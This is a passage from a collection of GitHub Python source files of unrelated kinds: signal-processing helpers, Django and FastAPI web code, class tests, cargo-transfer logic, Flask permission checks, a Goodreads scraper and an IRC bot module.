freq_range=frange)\n init_ap_fit = gen_aperiodic(fm.freqs, fm._robust_ap_fit(fm.freqs, fm.power_spectrum))\n return fm.freqs, init_ap_fit\n\n\ndef find_closest_index(data: ArrayLike, datapoint: float) -> int:\n \"\"\"\n Given an array of data and a datapoint it returns the index of the element that has\n the minimum difference to the datapoint\n :param data: data array-like\n :param datapoint: datapoint to find a close value to\n :return: index of the closest element\n \"\"\"\n min_difference = np.inf\n idx = 0\n for i in range(len(data)):\n if abs(data[i] - datapoint) < min_difference:\n min_difference = abs(data[i] - datapoint)\n idx = i\n return idx\n\n\ndef find_closest_smaller_index(data: ArrayLike, datapoint: float) -> int:\n \"\"\"\n Given an array of data and a datapoint it returns the index of the element that is the closest but lower than\n the datapoint\n :param data: data array-like\n :param datapoint: datapoint to find a close value to\n :return: index of the closest element, lower than the datapoint\n \"\"\"\n min_difference = np.inf\n idx = 0\n for i in range(len(data)):\n if abs(data[i] - datapoint) < min_difference:\n if data[i] < datapoint:\n min_difference = abs(data[i] - datapoint)\n idx = i\n return idx\n\n\ndef get_fast_foofed_specgram(raw: ArrayLike, fs: float, nperseg: int,\n noverlap: int, frange: List[int] = None) -> (ArrayLike, ArrayLike, ArrayLike):\n \"\"\"\n Returns a matrix corresponding to a periodgram where from each column the aperiodic component has been subtracted.\n Because of computational intensity only the overall aperiodic component is computed.\n :param raw: raw signal\n :param fs: sampling frequency\n :param nperseg: number of points per segment\n :param noverlap: number of points to overlap\n :param frange: frequency range for the in which to compute the aperiodic component\n :return: timepoints array, frequencies array, normalized matrix\n \"\"\"\n _t, _f, sxx = signal.spectrogram(raw, fs=fs, nperseg=nperseg, noverlap=noverlap)\n freqs, psd = signal.welch(raw, fs=fs, nperseg=nperseg, noverlap=noverlap)\n\n f, aperiodic = get_aperiodic(freqs=freqs, psd=psd, frange=frange)\n aperiodic = np.flipud(aperiodic[:, None])\n\n lower = find_closest_smaller_index(freqs, frange[0])\n upper = find_closest_smaller_index(freqs, frange[1])\n psd_matrix = np.log10(sxx[lower:upper])\n foofed = psd_matrix - aperiodic\n\n nt = len(foofed[-1]) * (nperseg - noverlap)\n t = np.linspace(0, nt, num=len(foofed[-1]))\n return t, f, foofed\n\n\ndef get_spectrogram_data(fs: float, raw: ArrayLike, nfft: int = None,\n noverlap: int = None, **kwargs) -> Tuple[ArrayLike]:\n \"\"\"\n Gets the data used to plot a spectrogram\n :param fs: sampling frequency\n :param raw: raw data\n :param nfft: nfft to compute the fft\n :param noverlap: number of overlap points\n :return:\n \"\"\"\n pxx, freq, t, _ = plt.specgram(raw, NFFT=nfft, Fs=fs, noverlap=noverlap, **kwargs)\n\n return pxx, freq, t","repo_name":"WengerLab/neurokin","sub_path":"utils/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":7844,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38563146866","text":"import urllib\nimport re\n\n\ndef urls_in_str(urls_str, query_extract='none'):\n urls = set()\n i = urls_str.find(';http')\n while i >= 0:\n urls.add(urllib.unquote(urls_str[:i]))\n urls_str = urls_str[i + 1:]\n i = urls_str.find(';http')\n urls.add(urllib.unquote(urls_str))\n return urls\n\n\ndef n_grams(urls, ns, min_word_length=2, 
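n_grams, whose signature continues just below, tokenizes each URL and joins consecutive tokens with underscores; the core of its 'alphanumeric' case as a compact sketch:

import re

def url_ngrams(url: str, n: int, min_len: int = 2) -> set:
    # Tokens are runs of at least `min_len` alphanumeric characters.
    tokens = re.findall(r"[a-zA-Z0-9]{%d,}" % min_len, url)
    return {"_".join(tokens[i:i + n]).lower() for i in range(len(tokens) - n + 1)}

# url_ngrams("http://example.com/shop/shoes", 2) ==
# {"http_example", "example_com", "com_shop", "shop_shoes"}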
word_type='alphanumeric'):\n \n grams = set()\n for n in ns:\n for url in urls:\n \n if word_type == 'letters':\n sequence = re.findall(r\"[a-zA-Z]{\" + str(min_word_length) + \",}\", url) \n elif word_type == 'alphanumeric':\n sequence = re.findall(r\"[a-zA-Z0-9]{\" + str(min_word_length) + \",}\", url)\n elif word_type == 'alphanumeric_':\n sequence = re.findall(r\"[a-zA-Z0-9_]{\" + str(min_word_length) + \",}\", url)\n\n for i in range(len(sequence) - n + 1):\n grams.add('_'.join(sequence[i:i + n]).lower())\n\n return grams\n\n\n\n\n\n\ndef iterraw(segment, mode='all', files_n=1):\n \"\"\"Iterator over dataset.\n \n Parameters:\n segment - string from ['gender_male', 'age_15_24', ...].\n mode - 'training' - only yield data items with CookieMod10 != 9,\n 'test' - only yield data items with CookieMod10 = 9,\n 'all' - yield all data items.\n files_n - integer, 0 < files_n < 48. Yield data from first\n files_n files.\n\n iterraw() yields tuples (cookie_id, label, urls_visited,\n domains_visited_rtb), where\n cookie_id - CookieID,\n label - 1, if user belongs to the given segment, 0 otherwise,\n urls_visited - string of urls separated by ';',\n domains_visited_rtb - string of domains separated by ';'.\"\"\"\n\n if mode == 'test':\n suffixes = ['ALL_MOD_9']\n elif mode == 'training' or mode == 'all':\n suffixes = ['000001', '000008', '000010', '000011', '000012', '000013',\n '000014', '000015', '000016', '000017', '000018', '000019',\n '000020', '000021', '000022', '000023', '000024', '000025',\n '000026', '000027', '000028', '000029', '000030', '000031',\n '000032', '000033', '000034', '000035', '000036', '000037',\n '000038', '000039', '000040', '000041', '000042', '000043',\n '000044', '000045', '000046', '000047', '000048', '000049',\n '000066', '000067', '000068', '000069', '000071'][:files_n]\n\n for suffix in suffixes:\n filename = ('data/20131015_female/'\n + '8191ca07-4888-4484-8bf6-44bdb7c66a77_' + suffix)\n f = open(filename, 'r')\n for line in f.readlines():\n \n (browser, os, screen_size, country, clicker, urls_visited,\n domains_visited_rtb, user_verticals, user_agent, cookie_mod_10,\n cookie_id, segments, negative, positive) = line.split('\\t')\n \n if mode == 'training' and cookie_mod_10 == '9':\n continue\n elif mode == 'train' and cookie_mod_10 != '9':\n continue\n \n if segment in segments:\n label = 1\n elif segment[:segment.find('_')] in segments:\n label = 0\n else:\n continue\n\n cookie_id = int(cookie_id)\n\n yield (cookie_id, label, urls_visited, domains_visited_rtb)\n\n f.close()","repo_name":"jurgisp/adform-dsp-acadmey","sub_path":"vb/demog3/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27134603944","text":"'''\nadd this to the end of settings.py\nenv settings for containerization\n\ntry:\n from .env_settings import * \nexcept ImportError: \n pass \n'''\n\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n#Get Django environment set by docker or use local\ntry:\n DJANGO_ENV = os.environ.get(\"DJANGO_ENV\")\nexcept:\n DJANGO_ENV = 'local'\n\n# env variable DJANGO_ENV set for development or production uses PostgreSQL\nif DJANGO_ENV == 'development' or DJANGO_ENV == 'production':\n\n try:\n SECRET_KEY = os.environ.get(\"SECRET_KEY\")\n except:\n SECRET_KEY = 'localsecret'\n\n try:\n DEBUG = bool(int(os.environ.get(\"DEBUG\", default=0)))\n except:\n DEBUG = False\n\n try:\n ALLOWED_HOSTS = 
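The try/except blocks around os.environ below each implement "read an env var, fall back to a default"; the same idea as one helper (a sketch, not from the source repo):

import os

def env(name, default, cast=str):
    # Missing variables fall back; present ones are cast to the right type.
    raw = os.environ.get(name)
    return default if raw is None else cast(raw)

DEBUG = env("DEBUG", False, cast=lambda v: bool(int(v)))
ALLOWED_HOSTS = env("DJANGO_ALLOWED_HOSTS", ["localhost"], cast=str.split)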
os.environ.get(\"DJANGO_ALLOWED_HOSTS\").split(\" \")\n except:\n ALLOWED_HOSTS = ['127.0.0.1', '0.0.0.0', 'localhost']\n\n DATABASES = {\n \"default\": {\n \"ENGINE\": os.environ.get(\"DB_ENGINE\", \"django.db.backends.sqlite3\"),\n \"NAME\": os.environ.get(\"POSTGRES_DB\", os.path.join(BASE_DIR, \"db.sqlite3\")),\n \"USER\": os.environ.get(\"POSTGRES_USER\", \"user\"),\n \"PASSWORD\": os.environ.get(\"POSTGRES_PASSWORD\", \"password\"),\n \"HOST\": os.environ.get(\"DB_HOST\", \"localhost\"),\n \"PORT\": os.environ.get(\"DB_PORT\", \"5432\"),\n }\n }\n\n# CORS rules\nCORS_ORIGIN_ALLOW_ALL = True\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '/static/'","repo_name":"spells3/robodc","sub_path":"env_settings.py","file_name":"env_settings.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69843117868","text":"import os\nimport math\nfrom pathlib import Path\nfrom fastapi import APIRouter, Request, status\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.templating import Jinja2Templates\n\nfrom .database import session\nfrom .models import QueryInfo, RequestInfo\n\nrouter = APIRouter()\n\n\nBASE_PATH = Path(__file__).resolve().parent\ntemplates = Jinja2Templates(directory=str(BASE_PATH / \"templates\"))\n\n\n@router.get(\"/all_request\", response_class=HTMLResponse)\nasync def all_request(request: Request, page: int = 1, limit: int = 20):\n \"\"\"Get all request.\"\"\"\n all_request_info = session.query(\n RequestInfo).order_by(-RequestInfo.id).all()\n total_request_info = len(all_request_info)\n total_pages = math.ceil(total_request_info / limit)\n\n start_index = (page - 1) * limit\n end_index = start_index + limit\n request_info = all_request_info[start_index:end_index]\n context = {\"request\": request, \"request_info\": request_info, \"current_api\": \"all_request\",\n \"page\": page,\n \"limit\": limit,\n \"total_pages\": total_pages,\n \"total_request_info\":total_request_info,\n }\n return templates.TemplateResponse(\"request_show.html\", context)\n\n\n@router.get(\"/request_detail/{id}\", response_class=HTMLResponse)\ndef request_show(id: int, request: Request):\n \"\"\"Get single request.\"\"\"\n request_query = session.query(RequestInfo).get(id)\n query_detail = session.query(QueryInfo).filter_by(request_id=id)\n sum_on_query = 0\n for query_details in query_detail:\n sum_on_query = sum_on_query + query_details.time_taken\n templates.env.globals['current_id'] = id\n context = {\"request\": request, \"request_query\": request_query, \"sum_on_query\": sum_on_query}\n return templates.TemplateResponse(\"request.html\", context)\n\n\n@router.get(\"/request_query/{id}\", response_class=HTMLResponse)\ndef request_query(id: int, request: Request):\n \"\"\"Get single request.\"\"\"\n request_query = session.query(RequestInfo).get(id)\n query_detail = session.query(QueryInfo).filter_by(request_id=id)\n sum_on_query = 0\n for query_details in query_detail:\n sum_on_query = sum_on_query + query_details.time_taken\n templates.env.globals['current_id'] = id\n context = {\"request\": request, \"request_query\": request_query, \"query_detail\": query_detail, \"sum_on_query\": sum_on_query}\n return templates.TemplateResponse(\"sql_query.html\", context)\n\n\n@router.get(\"/request_query_details/{id}\", response_class=HTMLResponse)\ndef request_query_details(id: int, request: Request):\n \"\"\"Get single request.\"\"\"\n query_detail = 
session.query(QueryInfo).get(id)\n traceback_contents = query_detail.traceback.strip().splitlines()\n traceback_groups = []\n current_group = []\n\n for traceback_content in traceback_contents:\n if 'File \"\"' not in traceback_content:\n if traceback_content.startswith(\" File\"):\n if current_group:\n traceback_groups.append(current_group)\n current_group = []\n current_group.append(traceback_content)\n\n if current_group:\n traceback_groups.append(current_group)\n traceback = []\n for traceback_group in traceback_groups:\n traceback_string = '\\n'.join(traceback_group)\n traceback.append(traceback_string)\n virtualenv_path = os.environ.get('VIRTUAL_ENV')\n context = {\"request\": request,\"query_detail\":query_detail,\"traceback\":traceback,\"virtualenv_path\":virtualenv_path,\"current_api\": \"request_query_details\"}\n return templates.TemplateResponse(\"sql_query_detail.html\", context)\n\n\n@router.delete('/clear_db')\ndef destory(requset: Request):\n \"\"\"Clear DB.\"\"\"\n session.query(RequestInfo).delete()\n session.query(QueryInfo).delete()\n session.commit()\n return JSONResponse(content={\"message\": \"Clear Db Successfully\"},\n status_code=status.HTTP_200_OK)\n","repo_name":"Sarvadhi-Solutions/fastapi-sql-profiler","sub_path":"fastapi_sql_profiler/add_request.py","file_name":"add_request.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"14696727119","text":"import pytest\nfrom razas import *\n\n\nclass Test_unitariossetter():\n def test_crear(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n\n def test_enano(self):\n gimbli = Enano()\n assert(isinstance(gimbli, Mortal))\n assert(isinstance(gimbli, MortalCodicioso))\n\n assert(gimbli.salud == 100)\n gimbli.salud = 50\n gimbli.beber()\n assert(gimbli.salud == 70)\n\n assert(gimbli.dinero == 10)\n gimbli.minar()\n assert(gimbli.dinero == 11)\n\n gimbli.codicia()\n assert(gimbli.salud == 60)\n assert(gimbli.dinero == 16)\n\n def test_hobbit(self):\n frodo = Hobbit()\n\n frodo.salud = 10\n\n frodo.comer()\n assert(frodo.salud == 100)\n\n def test_mago(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n assert(not isinstance(gandalf, Mortal))\n gandalf.anadir_miembro_compania(frodo)\n gandalf.anadir_miembro_compania(aragorn)\n gandalf.anadir_miembro_compania(gimbli)\n gandalf.anadir_miembro_compania(legolas)\n\n assert(len(gandalf._compania) == 4)\n\n def test_properties(self):\n isinstance(Enano().salud, property)\n isinstance(Enano().dinero, property)\n\n\nclass Test_integracion():\n\n def test_orco(self):\n azog = Orco()\n gimbli = Enano()\n\n azog.atacar(gimbli)\n assert(gimbli.salud == 90)\n\n def test_humano(self):\n aragorn = Humano()\n assert(isinstance(aragorn, Mortal))\n assert(isinstance(aragorn, MortalCodicioso))\n\n assert(aragorn.salud == 100)\n aragorn._salud = 50\n aragorn.beber()\n assert(aragorn.salud == 60)\n\n assert(aragorn.dinero == 10)\n\n aragorn.codicia()\n assert(aragorn.salud == 50)\n assert(aragorn.dinero == 15)\n\n for i in range(11):\n aragorn.beber()\n assert(aragorn.salud == 100)\n\n gimbli = Enano()\n aragorn.atacar(gimbli)\n assert(gimbli.salud == 90)\n\n def test_elfo(self):\n legolas = Elfo()\n gimbli = Enano()\n\n assert(legolas.flechas == 10)\n legolas.recargar()\n legolas.disparar_flecha(gimbli)\n assert(gimbli.salud == 90)\n assert(legolas.flechas 
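request_query_details above groups a formatted traceback into one block per 'File ...' frame; the grouping logic on a toy traceback (hypothetical input):

tb = '  File "a.py", line 1\n    foo()\n  File "b.py", line 2\n    bar()'
groups, current = [], []
for line in tb.splitlines():
    if line.startswith("  File") and current:
        groups.append("\n".join(current))  # close the previous frame
        current = []
    current.append(line)
groups.append("\n".join(current))
assert len(groups) == 2  # one block per stack frame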
== 9)\n\n def test_sanar(self):\n legolas = Elfo()\n gandalf = Mago()\n legolas.salud -= 20\n gandalf.sanar(legolas)\n assert(legolas.salud == 100)\n\n\nclass Test_excepciones():\n\n def test_elfo_no_preparado(self):\n legolas = Elfo()\n gimbli = Enano()\n\n with pytest.raises(FlechaNoPreparada) as e:\n legolas.disparar_flecha(gimbli)\n assert e.type == FlechaNoPreparada\n\n def test_compania_sin_hobbit(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n with pytest.raises(CompaniaSinHobbit) as e:\n gandalf.anadir_miembro_compania(aragorn)\n assert e.type == CompaniaSinHobbit\n\n def test_orco_compania(self):\n frodo = Hobbit()\n aragorn = Humano()\n gimbli = Enano()\n legolas = Elfo()\n gandalf = Mago()\n azog = Orco()\n gandalf.anadir_miembro_compania(frodo)\n with pytest.raises(OrcoEnCompania) as e:\n gandalf.anadir_miembro_compania(azog)\n assert e.type == OrcoEnCompania\n\n def test_properties(self):\n isinstance(Enano().salud, property)\n isinstance(Enano().dinero, property)\n","repo_name":"kiey/Lord_Of_Objects_Students","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38787675789","text":"import sys\nfrom os import path\nfrom pydub import AudioSegment\n\nfilePath = sys.argv[1]\nfilePathArr = filePath.split(\"/\")\nfileName = filePathArr[len(filePathArr) - 1]\n\n# files \nsrc = filePath\ndst = \"./audio/{}.wav\".format(fileName.split(\".\")[0])\n\n# convert mp3 to wav \nsound = AudioSegment.from_mp3(src)\nsound.export(dst, format=\"wav\")","repo_name":"Ronald-Prato/audio_processing","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32273036474","text":"from CargoGrid import Cargo_Grid\nfrom CargoGrid import Cargo\nimport pandas as pd\nimport copy\n\n\nclass Transfer:\n\n # cargoList = [] # list of containers\n # nodeList = [] # list of states\n\n def __init__(self, CargoGrid, loadFile, unloadFile):\n self.CargoGrid = CargoGrid\n\n LoadHeaders = ['Cargo']\n self.LoadDF = pd.read_csv(\n loadFile, sep=',', names=LoadHeaders, engine='python')\n\n UnloadHeaders = ['Position']\n self.UnloadDF = pd.read_csv(\n unloadFile, sep=', ', names=UnloadHeaders, engine='python')\n\n self.UnloadList = [] # contains cargo that needs to be unloaded\n self.LoadList = [] # contains cargo getting loaded.\n self.conversion()\n\n def conversion(self): # inputs data into class's list data members\n LoadCargo = Cargo()\n\n for x in (self.LoadDF['Cargo']):\n LoadCargo.name = x\n self.LoadList.append(copy.deepcopy(LoadCargo))\n\n for p in self.UnloadDF['Position']:\n x = int(p[0])\n y = int(p[2])\n self.UnloadList.append(copy.deepcopy(\n self.CargoGrid.cargo_grid[x][y]))\n\n self.UnloadList = sorted(\n self.UnloadList, reverse=True, key=lambda x: x.position[0])\n # self.UnloadList.append(self.CargoGrid.cargo_grid[x][y])\n\n \"\"\"\n def CargoList(self):\n for x in range(len(self.CargoGrid.cargo_grid)):\n if (x == 0):\n continue\n for y in range(len(self.CargoGrid.cargo_grid[x])):\n if (y == 0):\n continue\n if (self.CargoGrid.cargo_grid[x][y].name != \"NAN\" and self.CargoGrid.cargo_grid[x][y].name != \"UNUSED\"):\n self.cargoList.append(copy.deepcopy(\n self.CargoGrid.cargo_grid[x][y]))\n \"\"\"\n\n def setGoals(self):\n for cargo in self.UnloadList:\n 
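# Manhattan distance from this container to the unload point, assumed to be cell (9, 1) next to the truck (see Unload() below)\n 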
x = cargo.position[0]\n y = cargo.position[1]\n cargo.GoalDistance = abs(9-x) + abs(1 - y)\n\n # removes cargo from ship and places it on truck. also finds manhattan distance.\n def Unload(self, unloadCargo):\n x = unloadCargo.position[0]\n y = unloadCargo.position[1]\n if (self.CargoGrid.cargo_grid[x+1][y].name == 'UNUSED'):\n # goal is (9,1) + 2 minutes from ship to truck\n\n if (self.CargoGrid.new_pos[0] != 0 and self.CargoGrid.new_pos[1] != 0):\n if (self.CargoGrid.new_pos == \"Truck\"):\n self.CargoGrid.Manhattan_Dist += abs(9 - x) + \\\n abs(1 - y) + 2\n else:\n self.CargoGrid.Manhattan_Dist += abs(\n x - self.CargoGrid.new_pos[0]) + abs(y - self.CargoGrid.new_pos[1])\n\n self.CargoGrid.Manhattan_Dist += abs(9 - x) + \\\n abs(1 - y) + 2\n self.CargoGrid.cargo_grid[x][y].name = 'UNUSED'\n self.CargoGrid.cargo_grid[x][y].weight = 0\n\n self.CargoGrid.old_pos = [x, y]\n self.CargoGrid.new_pos = \"Truck\"\n\n def Load(self, loadedCargo, position): # loads cargo onto ship at position\n x = position[0]\n y = position[1]\n self.CargoGrid.cargo_grid[x][y].name = loadedCargo.name\n self.CargoGrid.cargo_grid[x][y].weight = loadedCargo.weight\n # initial position is (9,1) + 2 minutes from truck to ship\n self.CargoGrid.Manhattan_Dist += abs(9 - x) + \\\n abs(1 - y) + 2\n self.CargoGrid.old_pos = \"Truck\"\n self.CargoGrid.new_pos = position\n\n def Transfer(self, filename):\n i = 0\n if (len(self.UnloadList) != 0 or len(self.LoadList) != 0):\n transfer = False\n output = \"\"\n self.setGoals()\n self.CargoGrid.output_progression(i)\n self.UnloadList = sorted(\n self.UnloadList, key=lambda x: x.GoalDistance)\n\n while not transfer:\n if len(self.UnloadList) > 0: # unload\n j = 0\n for cargo in (self.UnloadList):\n # check if container is blocking unload\n while self.CargoGrid.cargo_grid[cargo.position[0] + 1][cargo.position[1]].name != \"UNUSED\":\n\n # in case more then one cargo is blocking, get position of highest container in column\n blockingPosition = self.CargoGrid.highestContainer(\n cargo.position[1])\n\n blockingCargo = self.CargoGrid.cargo_grid[blockingPosition[0]\n ][blockingPosition[1]]\n # blockingCargo = self.CargoGrid.cargo_grid[cargo.position[0]+1][cargo.position[1]]\n\n if (blockingCargo.position[1] == 12):\n self.CargoGrid.change_pos(blockingCargo.position, self.CargoGrid.lowestPosition(\n blockingCargo.position[1] - 1)) # move left if blocking cargo is at the end\n else:\n self.CargoGrid.change_pos(blockingCargo.position, self.CargoGrid.lowestPosition(\n blockingCargo.position[1] + 1)) # move to right if cargo is blocking unload\n i += 1\n self.CargoGrid.output_progression(i)\n output += f\"Move {self.CargoGrid.cargo_grid[(self.CargoGrid.new_pos[0])][(self.CargoGrid.new_pos[1])].name} from ({str(self.CargoGrid.old_pos[0])},{str(self.CargoGrid.old_pos[1])}) to ({str(self.CargoGrid.new_pos[0])},{str(self.CargoGrid.new_pos[1])}), Time: {str(self.CargoGrid.Manhattan_Dist)} minutes\\n\"\n\n self.Unload(cargo)\n self.UnloadList.pop(j)\n output += f\"Move {cargo.name} from ({str(self.CargoGrid.old_pos[0])},{str(self.CargoGrid.old_pos[1])}) to truck, Time: {str(self.CargoGrid.Manhattan_Dist)} minutes\\n\"\n i += 1\n self.CargoGrid.output_progression(i)\n j += 1\n break\n\n if len(self.LoadList) > 0: # load\n loadedCargo = self.LoadList.pop(0)\n for column in range(1, 13):\n # load into lowest position of first column that is not full\n if (self.CargoGrid.cargo_grid[8][column].name == \"UNUSED\"):\n self.Load(\n loadedCargo, self.CargoGrid.lowestPosition(column))\n break\n i += 1\n 
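# snapshot the grid after relocating the blocking container (output_progression is assumed to record the state for step i)\n 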
self.CargoGrid.output_progression(i)\n output += f\"Move {loadedCargo.name} from truck to ({str(self.CargoGrid.new_pos[0])},{str(self.CargoGrid.new_pos[1])}), Time: {str(self.CargoGrid.Manhattan_Dist)} minutes\\n\"\n\n if (len(self.UnloadList) == 0 and len(self.LoadList) == 0):\n with open(filename, \"w\") as file:\n file.write(output)\n transfer = True\n else:\n return\n","repo_name":"kartikgulia/Ship-Sorting-Balancing-CodeCraft-Solutions-Backend-","sub_path":"Transfer.py","file_name":"Transfer.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39366410544","text":"from collections import namedtuple\nfrom functools import partial, wraps\n\nfrom flask import abort\nfrom flask_principal import (\n Permission,\n RoleNeed\n)\nfrom bookmark_api.models import (\n User,\n Bookmark\n)\n\n\nBookmarkNeed = namedtuple('bookmark', ['method', 'value'])\nUserNeed = namedtuple('user', ['method', 'value'])\n\nViewBookmarkNeed = partial(BookmarkNeed, 'view')\nDeleteBookmarkNeed = partial(BookmarkNeed, 'delete')\nEditBookmarkNeed = partial(BookmarkNeed, 'edit')\n\nViewUserNeed = partial(UserNeed, 'view')\nDeleteUserNeed = partial(UserNeed, 'delete')\nEditUserNeed = partial(UserNeed, 'edit')\n\n\nclass ViewBookmarkPermission(Permission):\n def __init__(self, id):\n need = ViewBookmarkNeed(id)\n super(ViewBookmarkPermission, self).__init__(need)\n\n\nclass DeleteBookmarkPermission(Permission):\n def __init__(self, id):\n need = DeleteBookmarkNeed(id)\n super(DeleteBookmarkPermission, self).__init__(need)\n\n\nclass EditBookmarkPermission(Permission):\n def __init__(self, id):\n need = EditBookmarkNeed(id)\n super(EditBookmarkPermission, self).__init__(need)\n\n\nclass ViewUserPermission(Permission):\n def __init__(self, id):\n need = ViewUserNeed(id)\n super(ViewUserPermission, self).__init__(need)\n\n\nclass DeleteUserPermission(Permission):\n def __init__(self, id):\n need = DeleteUserNeed(id)\n super(DeleteUserPermission, self).__init__(need)\n\n\nclass EditUserPermission(Permission):\n def __init__(self, id):\n need = EditUserNeed(id)\n super(EditUserPermission, self).__init__(need)\n\n\nadmin_permission = Permission(RoleNeed('admin'))\nclient_permission = Permission(RoleNeed('client'))\n\n\ndef requires_permission(**params):\n def wrapper(f):\n @wraps(f)\n def wrapped(*args, **kwargs):\n id = kwargs[params['field']]\n permission = params['permission_class'](id)\n if permission.can():\n return f(*args, **kwargs)\n return abort(403)\n return wrapped\n return wrapper\n\n\ndef provide_permissions(identity):\n user = User.query.get(identity.id)\n role_name = user.role.name\n identity.provides.add(RoleNeed(role_name))\n if role_name == 'client':\n _provide_client_permissions(identity, user)\n elif role_name == 'admin':\n _provide_admin_permissions(identity, user)\n\n\ndef _provide_client_permissions(identity, user):\n for bookmark in user.bookmarks:\n for need_class in [ViewBookmarkNeed, DeleteBookmarkNeed, EditBookmarkNeed]:\n identity.provides.add(need_class(bookmark.id))\n identity.provides.add(DeleteUserNeed(identity.id))\n identity.provides.add(ViewUserNeed(identity.id))\n identity.provides.add(EditUserNeed(identity.id))\n\n\ndef _provide_admin_permissions(identity, user):\n for bookmark in Bookmark.query.all():\n identity.provides.add(ViewBookmarkNeed(bookmark.id))\n for user in User.query.all():\n for need_class in [ViewUserNeed, EditUserNeed, DeleteUserNeed]:\n 
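# grant the admin the full set of view/edit/delete needs for every user account\n 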
identity.provides.add(need_class(user.id))\n","repo_name":"rai200890/bookmark-api","sub_path":"bookmark_api/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40852441774","text":"from book_scrapper import *\nfrom author_scrapper import *\nimport database\n\n''' This file contains the full scrapper\n'''\nclass Scrapper:\n def __init__(self, starting_url, num_books, num_authors):\n ''' initialize a scrapper\n\n Args:\n starting_url: url of the starting page\n num_books: number of books to scrape\n num_authors: number of authors to scrape\n '''\n self._starting_url = starting_url\n self._num_books = num_books\n self._num_authors = num_authors\n self._client = database.connect_to_server()\n\n if self._client is None:\n return\n\n # initial counts are 0\n self._book_count = 0\n self._author_count = 0\n\n \n\n def initial_scrap(self):\n # scrape the starting book first\n book_id = self.find_id_in_url(self._starting_url)\n book = BookScrapper(self._starting_url, book_id)\n book_info = book.get_info_dictionary()\n if not database.already_exist(book_id, False, False, self._client):\n database.insert_data(False, False, book_info, self._client)\n self._book_count += 1\n print(\"finish scrapping book with id \" + book_id)\n\n author_id = self.find_id_in_url(book_info[\"author_url\"])\n author = AuthorScrapper(book_info[\"author_url\"], author_id)\n author_info = author.get_info_dictionary()\n\n if not database.already_exist(author_id, True, False, self._client):\n database.insert_data(True, False, author_info, self._client)\n self._author_count += 1\n\n # save current author since the next book and author to scrape\n # is related to the first author\n self._current_author = author_info\n\n print(\"finish scrapping author with id \" + author_id)\n\n self.start_traversing()\n database.close_client(self._client)\n \n \n \n def find_id_in_url(self, url):\n ''' find id of a book or author from url\n\n Return:\n id found\n '''\n everything_after_show = url.split(\"show/\")[1]\n\n id = everything_after_show.split(\".\")[0]\n if (len(id) == len(everything_after_show)):\n # if split does not have any effect, the url is formatted in another way\n id = everything_after_show.split(\"-\")[0]\n\n return id\n\n def start_traversing(self):\n ''' start scraping and stop after scraping num_books and num_authors\n '''\n while (self._book_count != self._num_books \n and self._author_count != self._num_authors):\n\n # upper limit to scrape\n if self._book_count + self._author_count > 2000:\n break\n\n # get all books of current author first\n author_books = self._current_author[\"author_books\"]\n for book_url in author_books:\n if self._book_count >= self._num_books:\n break\n book_id = self.find_id_in_url(book_url)\n\n # check if book is already scraped\n if database.already_exist(book_id, False, False, self._client):\n continue\n \n book = BookScrapper(book_url, book_id)\n # insert book info into database\n database.insert_data(False, False, book.get_info_dictionary(), self._client)\n self._book_count += 1\n print(\"finish scrapping book with id \" + book_id)\n time.sleep(3)\n\n # get all related authors\n related_authors = self._current_author[\"related_authors\"]\n for author_url in related_authors:\n if self._author_count >= self._num_authors:\n break\n author_id = self.find_id_in_url(author_url)\n\n # check if author is already scraped\n if 
database.already_exist(author_id, True, False, self._client):\n continue\n\n author = AuthorScrapper(author_url, author_id)\n author_info = author.get_info_dictionary()\n # insert book info into database\n database.insert_data(True, False, author_info, self._client)\n self._author_count += 1\n print(\"finish scrapping author with id \" + author_id)\n self._current_author = author_info\n time.sleep(3)","repo_name":"xinshuoLei/Goodreads-Scrapper","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11127116038","text":"#--depends-on commands\n\nfrom src import ModuleManager, utils\n\nclass Module(ModuleManager.BaseModule):\n @utils.hook(\"received.command.echo\")\n @utils.kwarg(\"min_args\", 1)\n def echo(self, event):\n event[\"stdout\"].write(event[\"args\"])\n\n @utils.hook(\"received.command.action\")\n @utils.kwarg(\"min_args\", 1)\n @utils.kwarg(\"expect_output\", False)\n def action(self, event):\n event[\"target\"].send_message(\"\\x01ACTION %s\\x01\" % event[\"args\"])\n\n @utils.hook(\"received.command.msg\")\n @utils.kwarg(\"min_args\", 2)\n @utils.kwarg(\"permission\", \"say\")\n @utils.kwarg(\"remove_empty\", False)\n @utils.kwarg(\"help\", \"Send a message to a target\")\n def msg(self, event):\n event[\"server\"].send_message(event[\"args_split\"][0],\n \" 